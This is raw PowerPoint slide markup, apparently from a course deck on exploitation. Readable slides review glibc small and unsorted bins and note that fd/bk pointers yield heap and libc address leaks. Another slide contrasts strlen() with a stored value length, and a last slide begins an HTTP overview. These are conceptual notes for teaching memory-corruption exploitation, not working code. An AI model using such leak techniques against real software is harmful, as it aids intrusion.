            <a:off x="111713" y="5036999"/>
            <a:ext cx="8513093" cy="1549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9577176-AA51-0341-8FED-29C83821D059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450527" y="2842458"/>
            <a:ext cx="6670944" cy="84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latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>query_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value_len</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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3779554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74D2B9C-B582-4616-AA35-49098AD353E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="283613"/>
            <a:ext cx="3541898" cy="1200150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reviewing the Small Bin/Unsorted Bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Smallbin diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD6800F6-0CC5-994A-AF3A-FE9FA214F87A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3277323" y="1587225"/>
            <a:ext cx="3568135" cy="3212034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7BF8C4D-23C1-4C9F-83FE-05814B0DA014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="94382" y="1546620"/>
            <a:ext cx="2949178" cy="2858691"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The end of a list points to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>bin:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> leak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointers to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>previous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>chunk: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap leak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd and Bk pointers are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>perfect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for heap and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> leaks</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1BE27B7-F312-7646-8BA5-F1AECDE7F141}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3815610" y="1869812"/>
              <a:ext cx="285480" cy="428400"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="Ink 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01BE27B7-F312-7646-8BA5-F1AECDE7F141}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3806610" y="1860812"/>
                <a:ext cx="30312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510B6D5B-9997-224B-B4F5-CD42D344FA20}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3277845" y="3302283"/>
              <a:ext cx="347760" cy="370080"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Ink 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{510B6D5B-9997-224B-B4F5-CD42D344FA20}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3268845" y="3293292"/>
                <a:ext cx="365400" cy="387703"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5416281C-69EB-9045-B05D-4AA66B6E5E49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1689846" y="2084012"/>
            <a:ext cx="2137606" cy="956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B91BC4-09E9-9B48-93BD-46DE3B36977C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784658" y="3020559"/>
            <a:ext cx="1492665" cy="4078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9DC3219-D0CB-184B-8B91-2B8DC98584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00103" y="111906"/>
            <a:ext cx="1952765" cy="4713571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA743938-ECFF-9549-8A14-F50A9A1F1229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7720578" y="1331106"/>
            <a:ext cx="421070" cy="178668"/>
            <a:chOff x="6203004" y="1652452"/>
            <a:chExt cx="332280" cy="179640"/>
          </a:xfrm>
        </p:grpSpPr>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46EE1FB3-B37E-2A4B-B504-62A089650C5D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6203004" y="1652452"/>
                <a:ext cx="360" cy="360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="15" name="Ink 14">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46EE1FB3-B37E-2A4B-B504-62A089650C5D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6194004" y="164345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A4316F38-31E3-7546-B589-45EF94115613}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6534564" y="1656772"/>
                <a:ext cx="360" cy="360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4316F38-31E3-7546-B589-45EF94115613}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6525564" y="164777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F661E741-6940-5A4A-8E4C-99810619A529}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6213084" y="1660012"/>
                <a:ext cx="322200" cy="172080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F661E741-6940-5A4A-8E4C-99810619A529}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId14"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6206265" y="1650955"/>
                  <a:ext cx="336122" cy="18983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5B9D4335-2C32-2E4B-90A5-DAB0B63CDCE9}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7703208" y="709844"/>
              <a:ext cx="207570" cy="261021"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="18" name="Ink 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B9D4335-2C32-2E4B-90A5-DAB0B63CDCE9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId16"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7694559" y="700856"/>
                <a:ext cx="225228" cy="27863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40F148EC-FCF3-A346-8D77-C7059000D9C0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7918387" y="704842"/>
              <a:ext cx="200271" cy="240254"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="19" name="Ink 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40F148EC-FCF3-A346-8D77-C7059000D9C0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId18"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7909742" y="695850"/>
                <a:ext cx="217921" cy="25787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19D1B7C1-4F87-0741-A6EF-39C3EEF94002}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8232974" y="761352"/>
              <a:ext cx="911026" cy="2855181"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="Ink 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D1B7C1-4F87-0741-A6EF-39C3EEF94002}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId20"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8223972" y="752712"/>
                <a:ext cx="928670" cy="287282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59CAEB0-84F7-A249-8C1B-AAFBA6956C63}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8244233" y="760994"/>
              <a:ext cx="444792" cy="127950"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Ink 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{659CAEB0-84F7-A249-8C1B-AAFBA6956C63}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId22"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8235229" y="751983"/>
                <a:ext cx="462440" cy="14561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499D6F74-C97C-8542-9EAB-2CC7214682F0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7703544" y="975185"/>
              <a:ext cx="26640" cy="340200"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="Ink 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{499D6F74-C97C-8542-9EAB-2CC7214682F0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId24"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7694544" y="966545"/>
                <a:ext cx="44280" cy="357840"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8262304F-6CB3-F44B-AD17-536EAD72BB8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8133024" y="883953"/>
            <a:ext cx="217959" cy="2607100"/>
            <a:chOff x="1380804" y="933380"/>
            <a:chExt cx="217959" cy="2607100"/>
          </a:xfrm>
        </p:grpSpPr>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6B4456C8-925F-1449-940D-0469DC44DE9A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1540369" y="2347639"/>
                <a:ext cx="456" cy="454"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="24" name="Ink 23">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B4456C8-925F-1449-940D-0469DC44DE9A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1528969" y="2336743"/>
                  <a:ext cx="22800" cy="227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A92D3D91-0164-444D-85CB-AB1F1111F97A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1440006" y="2376223"/>
                <a:ext cx="158757" cy="1164257"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="25" name="Ink 24">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A92D3D91-0164-444D-85CB-AB1F1111F97A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId27"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1431006" y="2367220"/>
                  <a:ext cx="176397" cy="118190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8711A09D-33E9-6C4F-AA90-608C6E84C59B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1488363" y="933380"/>
                <a:ext cx="456" cy="454"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="26" name="Ink 25">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8711A09D-33E9-6C4F-AA90-608C6E84C59B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1476963" y="922030"/>
                  <a:ext cx="22800" cy="227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4DF1C8BC-2D6F-9741-B79B-81D2875B0721}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1444112" y="956520"/>
                <a:ext cx="99451" cy="1360265"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="27" name="Ink 26">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF1C8BC-2D6F-9741-B79B-81D2875B0721}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId30"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1435104" y="947519"/>
                  <a:ext cx="117107" cy="1377907"/>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CC7EF24-8351-804F-B603-B147213FFBFA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1380804" y="997252"/>
                <a:ext cx="30600" cy="387360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="28" name="Ink 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CC7EF24-8351-804F-B603-B147213FFBFA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId32"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1371804" y="988612"/>
                  <a:ext cx="48240" cy="405000"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1258363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developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F65CD49-95C3-8040-94AF-14F3D62DE9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975"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="501588" y="3584755"/>
            <a:ext cx="5989653" cy="13946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36EB65-ACBC-554A-A92C-DB73DFD8CCBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP – Line One </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404A6106-56F7-534D-8073-4A7424D1ADF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Method/Verb:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
